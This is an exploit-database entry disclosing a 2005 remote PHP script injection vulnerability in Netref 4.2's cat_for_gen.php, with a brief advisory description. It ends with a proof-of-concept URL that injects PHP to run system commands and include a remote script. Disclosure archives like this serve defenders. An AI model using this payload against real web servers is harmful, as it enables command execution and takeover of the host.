Netref 4.2 Cat_for_gen.PHP Remote PHP Script Injection Vulnerability

2005-04-20T00:00:00
ID EDB-ID:25467
Type exploitdb
Reporter jaguar
Modified 2005-04-20T00:00:00

Description

Netref 4.2 Cat_for_gen.PHP Remote PHP Script Injection Vulnerability. CVE- 2005-1222 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/13275/info

A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer. 

http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>